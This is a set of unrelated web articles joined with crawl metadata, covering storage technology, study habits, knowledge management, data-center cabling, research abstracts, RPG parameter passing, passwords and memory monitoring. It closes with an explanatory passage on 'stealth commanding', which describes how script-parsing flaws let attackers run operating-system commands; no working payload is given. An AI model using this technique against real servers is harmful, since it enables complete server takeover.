Check out these other hot stories: | <urn:uuid:906de4dc-e510-4010-8add-c11fe21cb364> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2224462/security/can-nasa--air-force--private-industry-really-mitigate-asteroid-threat-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952118 | 2,350 | 3.546875 | 4 |
Flash is just seven years old this year, and applications are just beginning to really take advantage of it, so a discussion of its demise and the arrival of alternatives may seem premature. The reality is that flash opened Pandora's Box on the storage front and upset a long period of stagnation. Innovation is happening fast now in the storage industry.
In addition to efforts to evolve from 2D flash to 3D flash, the industry is developing at least seven storage technologies touted as faster and denser successors to today's flash.
The developments come as flash is starting to hit the limits of physics. Both the density and the speed of current technologies are topped out. The density issue is leading to a generation of 3D NAND where storage cells are stacked vertically on a die, instead of horizontally. This will increase capacity per die into the terabit range, though it adds cost, both in processing and in flaw management.
Stacking die is another option that's attractive. The driving forces are performance and power dissipation. Using a technology called "through-silicon via," die can be stacked on top of one another with connections going from one layer to the next. This technology becomes really interesting with the Hybrid Memory Cube (HMC) architecture, which uses many serial links for the through-via communications and stacks DRAM or flash together.
HMC uses very little power, saving perhaps 80% over today's solutions for DRAM. It's also much faster. The current specification envisions terabyte-per-second speeds.
With 3D flash, the main result will be small devices with lots of memory, perhaps including 1-inch SSD and multi-terabyte 2.5-inch products. Throw in HMC, and we will see memory stacked on to CPUs directly, with capacities in the terabyte range for DRAM and multiple terabytes for flash.
Super-chip modules such as these will power in-memory databases and HPC systems, and they will expand virtualization and hosted desktops, but there will be spinoffs once the TSV process gets ironed out and is cheap enough to be mainstream. These include baby super-chip stacks for mobile devices, for instance.
For all these gains, however, flash is less than ideal as a DRAM extender. It's just too slow. Writing is often sped up in flash or SSD devices by using some DRAM as a write buffer, but this doesn't handle the read speed mismatch that we would see in HMC, and even the best caching algorithms can't solve that problem.
This is where the next innovations in solid-state storage become important. Most of these emerging technologies boast much faster speed, getting close to DRAM levels. Most are denser, at least in theory. But most are still in the research labs.
The likeliest contenders are spintronic memory, which is in production in very small capacities, and resistive RAM. There are claims for demonstrations of terabit spin memory, but the money is on ReRAM winning the race, at least at the moment. With that technology, we might get to half the latency of a DRAM cell. Combine it with the parallel access approach of HMC, and that would be very acceptable performance.
In the longer term -- perhaps a decade out -- graphene interconnect and its use as a substrate hold promise for speeding up CPU and memory transistors while drastically reducing power. This would allow 3D stacking of CPU cores and DRAM pages. It would also open up a market for very large, inexpensive solid-state drives as replacements for today's spinning disk bulk storage.
Flash underpins much of the change occurring in IT today. That's why it sees such strong evolutionary pressures. Persistent solid-state memory is clearly a technology area to watch, and how it moves forward will affect the whole IT community in major ways. | <urn:uuid:2ed3b531-cc7d-4a0d-b3f2-1ad2aaec8d3d> | CC-MAIN-2017-04 | http://www.networkcomputing.com/storage/whats-next-flash/623109203?piddl_msgorder=asc | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00365-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953165 | 787 | 2.609375 | 3 |
Conduct in the Classroom
Most of us have spent some time in a classroom in our lives, and many of us will do so again, whether it’s for a certification program, technical training, soft skills seminar, etc. Few of us, however, have probably given too much thought to how we conduct ourselves in a classroom setting and how particular approaches might help us learn better.
With that in mind, this week’s Study Guide will focus on some of the ways in which students can get more out of their classroom experiences. (For the purposes of this article, the “classroom” is limited to the live lecture format.)
- Do your homework. Before you take the class, that is. You need to know whether this will really help you achieve your career goals, so thoroughly evaluate what subjects the course will cover, who will teach it, what materials will be used and how much all of it will cost. Remember: This is an investment. Make sure you put your time, effort and money into something that will pay off down the line.
- Get there on time. This is important not only because you don’t want to miss anything but also because it’s a courtesy to your instructors and fellow students. If you come in after the class has started, it will be a disruption, no matter how stealthily you manage to sneak in. You’ll still have to find a seat and get out all of your note-taking implements. Plus, getting to class early allows you to better accomplish the next step…
- Find a good spot. When looking for a spot in the classroom, you’ll want to consider a few factors. First, what’s a good distance for actually taking in the sights and sounds of the lecture? How large is the room? Will the instructor be using any multimedia tools?
Also, try to avoid any distractions. If there’s a window in the room, don’t sit where you’ll be tempted to spend most of the session enjoying the view instead of paying attention to the teacher. Ditto for attractive classmates.
- Ask questions. You definitely want to try to pick your instructor’s brain, and a great way to do so is by asking questions in class. There’s a right way and a wrong way to do this, however. For starters, don’t just blurt out any question you can think of. If some query pops into your head during the lecture, wait a few minutes to see whether the teacher gets to it. If not, then wait for the brief lull in the talk that comes during a transition to another topic or, if it doesn’t come, the end of the class.
- Review what was covered. Following the session, look over your notes to see what was discussed, what you might be unclear about and what might have been missed. You can save those questions for the next class, or you might be able to contact your instructor before then. Many teachers today give students their e-mail addresses, and they welcome correspondence during off-hours. If you have that opportunity, take advantage of it. | <urn:uuid:ce10bb19-840e-47a4-9bca-b273f9409442> | CC-MAIN-2017-04 | http://certmag.com/conduct-in-the-classroom/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00181-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957817 | 655 | 2.578125 | 3 |
Five-Minute Breaks the Key to Attentiveness
Have you ever thought that you were paying attention during a lecture or a while reading a book, and then 10 minutes or three pages later, you realize that you have no idea what was said or read? I don’t know about you, but I have definitely been there. My guess is that you have been there as well—especially while studying or sitting in a classroom for a prolonged period.
Studies show that just as people’s muscles can give out after grueling non-stop exercise, a person’s brain can automatically shut down after prolonged sessions of studying or learning. Therefore, study breaks may be the key to effective learning and paying attention.
Experts suggest that for every 50 minutes of lecture or study that a five-minute break be taken after the first 25 minutes. Simply taking five minutes to stop, stand up, stretch and walk around will make a big difference in your ability to stay focused and retain information. And of course, the longer the study period, the longer the break gets. Another good rule of thumb is that when your mind begins to wander off, it is most likely a sign that you need to take a break.
Nevertheless, remember you have to be willing to allocate your attention in the first place. You have to truly engage your mind with the words on the page or the lecture given by the instructor.
I once had an art history professor—need I say more?—who believed that even if you were to sleep through his entire presentation, somehow the information may seep in, so it was better to attend class rather than sleep in at home. I am not saying that he was unwise, but seriously, most of us cannot even remember our dreams, let alone what TV show is playing in the background while taking a nap.
Another way to improve your attention span is by focusing on one task. Do not multi-task while trying to learn. (That includes studying while watching the latest episode of “24.”) Giving into the entertainment bug while studying will only serve as a distraction, and that study time will likely be worthless.
After reading this, you may be thinking, “Of course I need to pay attention while studying or in a classroom. Isn’t that common sense?” Well, it may just be common sense, but I know that I need to hear the statement, “Snap out of it,” every so often. | <urn:uuid:045d6e7c-4a58-40e8-99d4-33588d133746> | CC-MAIN-2017-04 | http://certmag.com/five-minute-breaks-the-key-to-attentiveness/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00089-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.970723 | 510 | 2.984375 | 3 |
Knowledge Management examines how we acquire, organize, manage, share, and utilize knowledge and information. The Internet gives us an overwhelming amount of information on a daily basis — and the volume of information available is growing rapidly! One of the biggest challenges for individuals and organizations involved in project management is to make the best use of this knowledge and information so they can operate more efficiently, improve decision making, and sustain a competitive advantage.
What Is Knowledge Management?
Simply put, it is how information is converted into knowledge that is an asset to the organization. We learn from each project we complete, but without management support and knowledge management tools and processes in place, this knowledge is routinely lost during the project lifecycle, and it may take a cultural shift to recognize the strategic importance and value of knowledge and information.
Why Knowledge Management?
Knowledge management uses knowledge as an organizational benefit that is an essential component of project management. Organizations that make the greatest use of their knowledge assets understand the competitive advantage they can develop as they manage projects smartly and more efficiently.
People, Process, and Tools
Knowledge management is about how to systematically develop and share knowledge throughout the organization. Adopting knowledge management in an organization involves three major items.
- People: This involves understanding the importance of knowledge and information to organizational success.
- Process: This involves having a framework for knowledge management in the organization and embedding that framework into project management processes and methodology.
- Tools: Some of the tools and technologies that can facilitate managing and sharing knowledge and information include document management systems, online communities through the use of web portals, data repositories for storing and retrieving lessons learned, and Web 2.0 tools such as wikis and blogs.
How to Apply Knowledge Management to Your Projects
Knowledge management and project management are complimentary practices that can work hand-in-hand to improve organizational performance. First you need to demonstrate the value of knowledge management practices, and then you can introduce knowledge management into the project management process and methodology.
The project manager can serve as a mentor or change agent to establish knowledge management activities as part of the project work. Once team members experience the benefit of knowledge sharing, they are more inclined to participate in the process.
When closing out a project, don’t forget to store important project artifacts (e.g. project charter, WBS, schedule, communication plan, risk and issues log, change control documents); these can serve as templates for future projects. The post-project review is a way to capture information for the knowledge repository. Beneficial knowledge provides long-term benefit in terms of improving organizational performance and fostering a learning organization.
Knowledge is increasingly being valued as a strategic asset essential to sustaining a competitive advantage. Knowledge management provides a way to capture knowledge from projects in as close to real time as possible, transfer the data and information, and apply those learnings to future projects. Applying knowledge management techniques to project management practices can result in enhanced communication and better project integration, improved decision-making, reduced risks, and continuous improvement in project performance. | <urn:uuid:cfded033-de99-4252-b0a7-eb063d3f4a7f> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2012/08/24/how-to-apply-knowledge-management-to-project-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00117-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911838 | 625 | 3.0625 | 3 |
With the amount of energy now required to power the world’s data centers, one of the greatest challenges in today’s data centers is minimizing costs associated with power consumption and cooling, which is also the requirement of building the green data center. Higher power consumption means increased energy costs and greater need for heat dissipation. This requires more cooling, which adds even more cost. Under these circumstances, high-speed optical fiber offers a big advantage over copper to reduce the network operational and cooling energy.
What Is Green Data Center?
The word “green” invokes natural images of deep forests, sprawling oak trees and financial images of dollar bills. The topic of green has been gaining momentum across international, commercial and industrial segments as global warming and greenhouse gas effects hit headlines. In terms of different fields, the word “green” has different definitions. Specific to the data center segment of the telecommunications industry, green data center is a repository for the storage, management, and dissemination of data in which the mechanical, lighting, electrical and computer systems are designed for maximum energy efficiency and minimum environmental impact.
How to Build Green Data Center?
Green data center address two issues which plague the average data center. One is the power required to run the actual equipment, the other is the power required to cool the equipment. Reduced the power required will effectively lessen not only the energy consumption but also the impact on environment. Green solutions include:
How Does Optical Fiber Benefit the Green Data Center Building?
Compared to copper cable, optical fiber may offer many advantages in contribution to building green data center. Usually, optical fiber connectivity can enhance green data center installations by utilizing high-port-density electronics with very low power and cooling requirements. Additionally, an optical network provides premier pathway and space performance in racks, cabinets and trays to support high cooling efficiency when compared to copper connectivity. All these advantages can be summarized as the following three points.
Lower Operational Power Consumption
Optical transceiver requires less power to operate compared to copper transceiver. Copper requires significant analog and digital signal processing for transmission that consumes significantly higher energy when compared to optical media. A 10G BASE-T transceiver in a copper system uses about 6 watts of power. A comparable 10G BASE-SR optical transceiver uses less than 1 watt to transmit the same signal. The result is that each optical connection saves about 5 watts of power. Data centers vary in size, but if we assume 10,000 connections at 5 watts each, that’s 50 kW less power—a significant savings opportunity thanks to less power-hungry optical technology.
Less Cooling Power Consumption
Optical system requires far fewer switches and line cards for equivalent bandwidth when compared to a copper card. Fewer switches and line cards translate into less energy consumption for electronics and cooling. One optical 48-port line card equals three copper 16-port line cards (as shown in the following picture). A typical eight-line card chassis switch would have 384 optical ports compared to 128 copper ports. This translates into a 3:1 port advantage for optical. It would take three copper chassis switches to have equivalent bandwidth to one optical chassis switch. The more copper chassis switches results in more network and cooling power consumption.
More Effective Management for Better Air-flow
Usually, a 0.7-inch diameter optical cable would contain 216 fibers to support 108 10G optical circuits, while 108 copper cables would have a 5.0-inch bundle diameter. The larger CAT 6A outer diameter impacts conduit size and fill ratio as well as cable management due to the increased bend radius. Copper cable congestion in pathways increases the potential for damage to electronics due to air cooling damming effects and interferes with the ability of ventilation systems to remove dust and dirt. Optical cable offers better system density and cable management and minimizes airflow obstructions in the rack and cabinet for better cooling efficiency. See the picture below: the left is a copper cabling system and the right is an optical cabling system.
Data center electrical energy consumption is projected to significantly increase in the next five years. Solutions to mitigate energy requirements, to reduce power consumption and to support environmental initiatives are being widely adopted. Optical connectivity supports the growing focus on a green data center philosophy. Optical cable fibers provide bandwidth capabilities that support legacy and future-data-rate applications. Optical fiber connectivity provides the reduction in power consumption (electronic and cooling) and optimized pathway space utilization necessary to support the movement to greener data centers. | <urn:uuid:46e75fb0-3a33-4129-9dfc-872a5dacfa32> | CC-MAIN-2017-04 | http://www.fs.com/blog/optical-fiber-benefits-the-green-data-center-building.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905092 | 913 | 3.3125 | 3 |
(1) A data structure accessed beginning at the root node. Each node is either a leaf or an internal node. An internal node has one or more child nodes and is called the parent of its child nodes. All children of the same node are siblings. Contrary to a physical tree, the root is usually depicted at the top of the structure, and the leaves are depicted at the bottom. (2) A connected, undirected, acyclic graph. It is rooted and ordered unless otherwise specified.
Thanks to Joshua O'Madadhain (email@example.com) for the figure, 6 October 2005.
Formal Definition: (1) A tree is either
Specialization (... is a kind of me.)
heap, B-tree, binary tree, balanced tree, multiway tree, complete tree, search tree, digital tree.
See also other vocabulary: descendant, ancestor, tree traversal, height, depth, degree (3), technical terms: ordered tree, rooted tree, free tree, arborescence.
Note: Appearing in the Dictionary of Computer Science, Engineering and Technology, Copyright © 2000 CRC Press LLC.
A tree in the data structure sense (1) is not the same as a tree in the graph sense (2). Consider possible binary trees with two nodes. There are two possible data structures: a root and a left subtree or a root and a right subtree. However there is only one possible graph: a root and a subtree. The graph definition doesn't allow for "the subtree is the right subtree and the left subtree is empty". Also there is no "empty" graph tree.
Thanks to Sharat Chandran (firstname.lastname@example.org) for clarifying the difference between these two senses.
The formal definition is after [CLR90, page 94].
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 14 August 2008.
HTML page formatted Mon Feb 2 13:10:40 2015.
Cite this as:
Paul E. Black and Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, "tree", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 14 August 2008. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/tree.html | <urn:uuid:f05f1bae-6ca9-4141-a130-8e2ce2fee81d> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/tree.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00539-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.874337 | 518 | 3.625 | 4 |
Chakraborti D.,Jadavpur University |
Rahman M.M.,Jadavpur University |
Rahman M.M.,University of South Australia |
Das B.,Jadavpur University |
And 11 more authors.
Water Research | Year: 2010
Since 1996, 52,202 water samples from hand tubewells were analyzed for arsenic (As) by flow injection hydride generation atomic absorption spectrometry (FI-HG-AAS) from all 64 districts of Bangladesh; 27.2% and 42.1% of the tubewells had As above 50 and 10 μg/l, respectively; 7.5% contained As above 300 μg/l, the concentration predicting overt arsenical skin lesions. The groundwater of 50 districts contained As above the Bangladesh standard for As in drinking water (50 μg/l), and 59 districts had As above the WHO guideline value (10 μg/l). Water analyses from the four principal geomorphological regions of Bangladesh showed that hand tubewells of the Tableland and Hill tract regions are primarily free from As contamination, while the Flood plain and Deltaic region, including the Coastal region, are highly As-contaminated. Arsenic concentration was usually observed to decrease with increasing tubewell depth; however, 16% of tubewells deeper than 100 m, which is often considered to be a safe depth, contained As above 50 μg/l. In tubewells deeper than 350 m, As >50 μg/l has not been found. The estimated number of tubewells in 50 As-affected districts was 4.3 million. Based on the analysis of 52,202 hand tubewell water samples during the last 14 years, we estimate that around 36 million and 22 million people could be drinking As-contaminated water above 10 and 50 μg/l, respectively. However for roughly the last 5 years due to mitigation efforts by the government, non-governmental organizations and international aid agencies, many individuals living in these contaminated areas have been drinking As-safe water. From 50 contaminated districts with tubewell As concentrations >50 μg/l, 52% of sampled hand tubewells contained As <10 μg/l, and these tubewells could be utilized immediately as a source of safe water in these affected regions provided regular monitoring for temporal variation in As concentration. Even in the As-affected Flood plain, sampled tubewells from 22 thanas in 4 districts were almost entirely As-safe. In Bangladesh and West Bengal, India the crisis is not having too little water to satisfy our needs, it is the challenge of managing available water resources. The development of community-specific safe water sources coupled with local participation and education are required to slow the current effects of widespread As poisoning and to prevent this disaster from continuing to plague individuals in the future. © 2010 Elsevier Ltd. Source | <urn:uuid:a047ffcb-4f05-42fb-be64-baf410fd5f98> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/dhaka-community-hospital-dch-1712706/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00539-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928604 | 590 | 2.625 | 3 |
Fundamentals: Parameter Passing
November 29, 2016 Jon Paris
Even though high-level languages make it unnecessary–and in many cases, difficult–to understand what is going on “under the covers,” I have always found a basic knowledge of internal processes to be invaluable. This is particularly true when it comes to resolving mystery bugs. I was reminded of this recently by a number of problems related to parameter passing that appeared on Internet lists and also in my email directly from customers.
My need to understand internals is due, at least in part, to the fact that I learned assembler and other low-level languages at an early stage in my career. Actually, the very first thing I learned was how to program calculators and tabulators using plug boards. With those things you had to understand the mechanics of what was going on!
I’m going to start my discussion of parameter passing from the beginning, so apologies to those readers who already know some of this stuff.
The most important thing to remember is that when you pass a parameter from one program to another, you are not passing any data. What you are passing is a pointer to (i.e., the memory address of) the first byte of the parameter’s storage in the originating program. And that is all that you are passing.
This is important to understand because it means that it is the receiving program that effectively defines what that parameter looks like in terms of data type and length, and that can cause some “interesting” problems if you are not careful. Let’s look at a simple example to see what I mean.
(A) Dcl-pr CallTgt1 extPgm; request char(4) Const; result char(10); End-Pr; (B) Dcl-ds data; parmData10 char(10) Inz('Input Parm'); moreData char(30) Inz('Original value of moreData'); End-Ds; Dcl-s wait char(1); (C) Dsply ( 'parmData10 = [ ' + parmData10 + ' ]' ); Dsply ( 'moreData = [ ' + moreData + ' ]' ); (D) CallTgt1 ( 'Fill': parmData10 ); (E) Dsply ( 'parmData10 = [ ' + parmData10 + ' ]' ); Dsply ( 'moreData = [ ' + moreData + ' ]' ); Dsply 'Press enter to continue' ' ' wait; *InLR = *On;
In the code above, notice that at (A) you can see the prototype for CALLTGT1, the program we are going to call. This program will change the content of the second parameter. Notice that the second parameter is defined as a 10-character variable.
At (B) you can see the definition of the variable parmData10, which will be passed (D) as that second parameter. Before we do the call, we display the content of both parmData10 and the variable moreData so that we can check their content.
Following the call at (D) we then display the content of the two variables again. Here are the results of running the program.
DSPLY parmData10 = [ Input Parm ] DSPLY moreData = [ Original value of moreData ] DSPLY parmData10 = [ Fill ] DSPLY moreData = [ alue of moreData ]
As expected, the content of parmData10 has been changed. But notice that so has the content of the variable moreData. How could that have happened?
You’ll hopefully see the problem when you look at the source of the program being called. Here it is:
pgm ( &input &output ) dcl &input *char 4 dcl &output *char 20 chgvar var(&output) value(&input) endpgm
See a problem? Yup! The parameter defined as 10 characters in the calling program is defined as 20 long in the receiving program. So, when the four character &input variable is moved to &output, instead of six spaces being added as padding, as the programmer might be expecting, a total of 16 are added, with the result that the first 10 characters of the variable moreData are overwritten because moreData has the misfortune of following parmData10 in memory.
Sadly, spotting this kind of corruption is rarely this easy. Just to demonstrate the point, try making this simple change to the calling program. Reverse the order of the variables moreData and parmData10 in the data data structure (DS). The DS now looks like this:
Dcl-ds data; moreData char(30) Inz('Original value of moreData'); parmData10 char(10) Inz('Input Parm'); End-Ds;
What do think will happen now? Well in this case the program runs successfully and the results look like this:
DSPLY parmData10 = [ Input Parm ] DSPLY moreData = [ Original value of moreData ] DSPLY parmData10 = [ Fill ] DSPLY moreData = [ Original value of moreData ]
Looks good, right? No corruption in sight. Except we know that corruption must still be occurring! So where did those extra 10 spaces go? Your guess is as good as mine! Truth is that we have no clue exactly what data is now being overwritten. The RPG compiler places variables in memory in what, from our perspective, is a completely arbitrary sequence. In the original example I deliberately placed the variables in a DS because that is the only time that you can guarantee exactly where in memory variables are located relative to one another and therefore observe the corruption taking place. But even then, there is no way to know what follows the end of the DS.
It is important to understand this because it can be really hard to diagnose the results of such errors. I have seen cases where the corrupted variables were subsequently written back to the database by an UPDATE operation, only to be discovered weeks later, forcing a complete rebuild of the history file they were part of.
In another case, the corruption was originally to a print buffer but because the print line was assembled after the corruption had occurred, the program apparently ran correctly. And kept on running for many, many years. Then one day it had to be recompiled. The changes made by the programmer were trivial and had no impact on the memory layout, but in the interim period the compiler folks had changed the way that variable storage was generated. The result was that all of a sudden, the corruption was to important internal program control pointers, and a few minutes into the program run, “BOOM!”
So how do we avoid such errors? Well the answer is the use of prototypes or, to be more precise, accurate prototypes. The code I showed here is typical of what I often see on customer sites. The prototype, at label (A), was apparently written by the programmer who wrote the program that uses it. The clue is in the fact that the prototype was hard coded in the source, whereas it should really be coming in via a /COPY directive. If you ever see a hard-coded prototype in an RPG source, be suspicious–be very suspicious–and get rid of it as soon as possible.
That /COPY source should have been written by the programmer who coded the CL routine being called. When calling CL programs, we really have no choice but to manually ensure that the prototype matches the actual parameters used by the called program. For C functions and system APIs there are IBM-supplied prototypes, but if, like me, you don’t like the style and naming conventions of those, then a quick Internet search will often locate excellent examples written by others.
When the prototype relates to an RPG program, things are better. By coding the /COPY in the called program and in all the calling programs, we can ensure that the prototype is a valid representation of the interface. When both are present, the compiler will compare the prototype (PR) and procedure interface (PI) and fail the compile if they don’t match. While we love the recent relaxation of the compiler’s rules on prototypes (i.e., that we no longer need to code prototypes for internal subprocedures), it has a regrettable side effect; namely that prototypes are no longer necessary in any program that has a PI defined. As a result, you can get away with not /COPYing in the prototype, but resist the temptation. Let the compiler validate the prototype you plan to use and you’ll avoid problems down the road.
Externalizing and /COPYing prototypes may seem like extra work up front. But while you’re doing it, just imagine how many future bugs you may be preventing! COBOL and CL programmers, I’m afraid you are on your own, so be careful out there!
Jon Paris is one of the world’s most knowledgeable experts on programming on the System i platform. Paris cut his teeth on the System/38 way back when, and in 1987 he joined IBM’s Toronto software lab to work on the COBOL compilers for the System/38 and System/36. He also worked on the creation of the COBOL/400 compilers for the original AS/400s back in 1988, and was one of the key developers behind RPG IV and the CODE/400 development tool. In 1998, he left IBM to start his own education and training firm, a job he does to this day with his wife, Susan Gantner–also an expert in System i programming. Paris and Gantner, along with Paul Tuohy and Skip Marchesani, are co-founders of System i Developer, which hosts the new RPG & DB2 Summit conference. Send your questions or comments for Jon to Ted Holt via the IT Jungle Contact page. | <urn:uuid:960f3483-bcdb-4a29-8e0a-04e5f5ab2bd1> | CC-MAIN-2017-04 | https://www.itjungle.com/2016/11/29/fhg112916-story01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00263-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936963 | 2,086 | 2.828125 | 3 |
Password…is not a good password
We live in a password-driven world. Passwords protect our finances, e-mail, computers, and even mobile devices. However, in the name of simplicity, we often choose either weak passwords or use the same passwords for every site we visit. This may be convenient, but it also opens us up to being hacked. Once a hacker has a single password, they have access to every site you visit. Above and beyond using different passwords for each site, there are a few simple rules to follow for creating a strong password:
• Passwords should be at least 10-12 characters in length and should not contain words found in the dictionary. A common password mistake is to replace letters in common words with numbers, such as substituting a zero for an “o” or the number three for an “e.”
• A good way to create strong passwords is to use the first letter in each word of a phrase you can easily remember. For example: I love to have my mother watch the kids for the weekend! The password could be: 1lthmmwtkftW!
This is a very strong password that someone can remember by repeating the phrase. It is important to have both upper and lower case letters along with numbers and symbols for a strong password.
For additional tips on Internet security, feel free to visit http://news.centurylink.com/resources/tips/centurylink-consumer-security-tips-online-security | <urn:uuid:e3337649-35fc-49df-a283-abeb8cd21474> | CC-MAIN-2017-04 | http://news.centurylink.com/blogs/security/passwordis-not-a-good-password | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00466-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927516 | 308 | 3.125 | 3 |
Using the Anturis Console, you can set up monitoring of free physical memory for any hardware component (a server computer) in your infrastructure by adding the Free Physical Memory monitor to the component.
Physical memory (also known as main memory or primary storage) is the only type of memory directly accessible by the CPU. It is used to store data that is actively being processed, as well as instructions that the CPU reads and executes. Data can be stored and retrieved in any order, which is why physical memory is often referred to as random-access memory (RAM), although auxiliary memory (such as, optical discs, magnetic disk drives, flash memory and other secondary storage devices) are also accessed in a random-access manner.
It is also very important for the CPU to access data in the physical memory in the shortest time possible, regardless of its location on the medium. RAM used for primary storage is fast, but volatile, meaning that data is only stored while there is power, and cleared at startup.
Running out of free physical memory is one of the reasons for server performance degradation. Some systems use secondary storage as virtual memory, moving the least-used data from the physical memory and retrieving it back when it is required. Besides the fact that secondary storage is much slower, such swapping leads to file system fragmentation, which contributes to an even greater decrease in server performance.
When there is little RAM left, you may want to consider optimizing the way physical memory is used by the OS and other software. If you are not able to reduce the amount of used physical memory, then you should add more RAM to the server.
A memory leak is a common problem for server software. It usually happens due to poor design, when an application does not properly discard unused objects from the main memory. The amount of memory constantly increases until there is no memory left for new objects, and the application crashes. RAM monitor can help identify a memory leak early and properly react to this problem before a crash occurs.
©2017 Anturis Inc. All Rights Reserved. | <urn:uuid:7ea88838-4dd5-4b87-afa3-5183d6fb97d8> | CC-MAIN-2017-04 | https://anturis.com/monitors/ram-monitor/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00374-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942778 | 415 | 3.234375 | 3 |
From camera systems to detecting drivers on the phone
Xerox is planning to showcase a research breakthrough which will make computers behave like humans.
Among the technologies which are going to be showcased include how mobile technology turns a smartphone into a driving coach, imaging technology that can detect drivers who text and technology to make images more eye-catching.
Raja Bala, Xerox principal scientist, said "Xerox has firsthand knowledge of business processes across many industries, and is a pioneer in teaching computers to extract meaningful and actionable analytics from images and video."
"Although there’s been significant progress in recent years, a number of scientific challenges remain to be resolved," Bala added.
Scientists from the company are working on a camera system for highways that uses pattern recognition technology to detect whether the driver is using a cell phone while driving.
Researchers at its Xerox Research Center Webster (XRCW) are developing a computer vision system which will make smartphones into driving assistants.
The system uses facial feature detection technology in the phone which estimates a driver’s gaze direction, and detect if a driver is distracted and not paying attention to the road.
Researchers from both Xerox in Europe and at Harvard University are studying eye catching elements in images, which will help in making visuals more attractive as well predict where people will be looking at in a photo or game.
The Xerox Research Centre Europe (XRCE) has invented a method which can automatically analyse an image and create a unique ‘visual signature’ that distinguishes it from other images.
The system claimed to create visual signatures in compact and robust fashion compared to the current deep learning methods.
The IEEE Computer Vision/Pattern Recognition Conference will run from 23-28 June in Columbus, US
Raja Bala, Xerox principal scientist, demonstrates a camera system for highways that uses pattern recognition technology to detect if a driver is using a cell phone. Image Courtesy: Xerox | <urn:uuid:73a40278-c01f-46ca-b65d-861e618b8de4> | CC-MAIN-2017-04 | http://www.cbronline.com/news/tech/software/businessintelligence/xerox-to-showcase-technologies-which-can-make-computers-human-like-4293240?sf27312959=1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00008-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929559 | 398 | 2.640625 | 3 |
Nunes S.S.,Lancaster University |
Nunes S.S.,Amazon Institute of People and the Environment Imazon |
Barlow J.,Lancaster University |
Gardner T.A.,Stockholm Environment Institute |
And 4 more authors.
Environmental Conservation | Year: 2015
SUMMARY Brazilian environmental law imposes more restrictions on land-use change by private landowners in riparian forests than in non-riparian forest areas, reflecting recognition of their importance for the conservation of biodiversity and key ecosystem services. A 22-year time series of classified Landsat images was used to evaluate deforestation and forest regeneration in riparian permanent preservation areas over the past two decades, focusing on the municipality of Paragominas in the state of Pará in eastern Amazonia. There was no evidence that riparian forests had been more effectively protected than non-riparian forests. Instead, deforestation was found to be comparatively higher inside riparian permanent preservation areas as recently as 2010, indicating a widespread failure of private property owners to comply with environmental legislation. There was no evidence for higher levels of regeneration in riparian zones, although property owners are obliged by law to restore such areas. A number of factors limit improvements in the protection and restoration of riparian forests. These include limited awareness of environmental compliance requirements, the need for improved technical capacity in mapping the distribution and extent of riparian forests and the boundaries of private properties, and improved access to the financial resources and technical capacity needed to support restoration projects. Copyright © Foundation for Environmental Conservation 2014. Source | <urn:uuid:765ea58c-bf23-4dd3-bba3-7be8762e4817> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/imazon-amazon-institute-of-people-and-the-environment-1821053/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00338-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.931108 | 318 | 2.578125 | 3 |
Stealth commanding is a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server. Stealth commanding is primarily used in the execution of operating system commands, allowing complete takeover of the server.
Stealth commanding enables attackers to execute arbitrary system-level commands. Likely targets are server-side includes, parsed scripts, CGIs (such as Perl), code that appears to take input and turn it into OS commands, and anything that takes parameters and turns them into parsed protocols.
Most script languages used for CGIs simply chain strings together when receiving parameters. In many occasions these scripts rely on OS commands, therefore they are relatively easy to exploit. The most common type of scripts is Perl CGIs.
Server-side includes are an old technology, used in the past to provide minimal server-side scripting capabilities (commonly appearing in .SHTML files). Server-side includes are still supported by many Web servers. Following is a server-side include example, which builds the header and footer sections of a Web page:
<!--#include file="header.html" -->
<!--#include file="footer.html" -->
